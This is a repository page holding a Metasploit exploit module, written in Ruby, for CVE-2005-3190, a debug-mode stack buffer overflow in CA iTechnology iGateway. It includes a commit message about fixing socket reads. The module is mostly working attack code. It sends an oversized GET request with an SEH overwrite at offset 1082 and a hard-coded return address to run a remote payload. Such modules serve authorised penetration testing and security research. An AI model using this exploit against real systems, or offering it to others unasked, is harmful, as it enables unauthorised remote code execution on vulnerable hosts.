adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ecace8beececbd71cc3eccca960ebaed3e1c83d1
metasploit-gs/modules/exploits/windows/http/ca_igateway_debug.rb
T
HD Moore 6e80481384 Fix bad use of sock.get() and check() implementations 
Many of these modules uses sock.get() when they meant get_once()
and their HTTP-based checks were broken in some form. The response
to the sock.get() was not being checked against nil, which would
lead to stack traces when the service did not reply (a likely
case given how malformed the HTTP requests were).
2014-06-28 16:05:05 -05:00

85 lines
2.3 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in the Computer Associates
iTechnology iGateway component. When <Debug>True</Debug> is enabled
in igateway.conf (non-default), it is possible to overwrite the stack
and execute code remotely. This module works best with Ordinal payloads.
},
'Author' => 'patrick',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2005-3190' ],
[ 'OSVDB', '19920' ],
[ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
[ 'EDB', '1243' ],
[ 'BID', '15025' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
'Compat' =>
{
'ConnectionType' => '+ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll
],
'Privileged' => true,
'DisclosureDate' => 'Oct 06 2005',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(5250),
], self.class)
end
def check
connect
sock.put("HEAD / HTTP/1.0\r\nHost: #{rhost}\r\n\r\n")
banner = sock.get_once
if (banner.to_s =~ /GET and POST methods are the only methods supported at this time/) # Unique?
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
seh = generate_seh_payload(target.ret)
buffer = Rex::Text.rand_text_alphanumeric(5000)
buffer[1082, seh.length] = seh
sploit = "GET /" + buffer + " HTTP/1.0"
sock.put(sploit + "\r\n\r\n\r\n")
disconnect
handler
end
end
Reference in New Issue View Git Blame Copy Permalink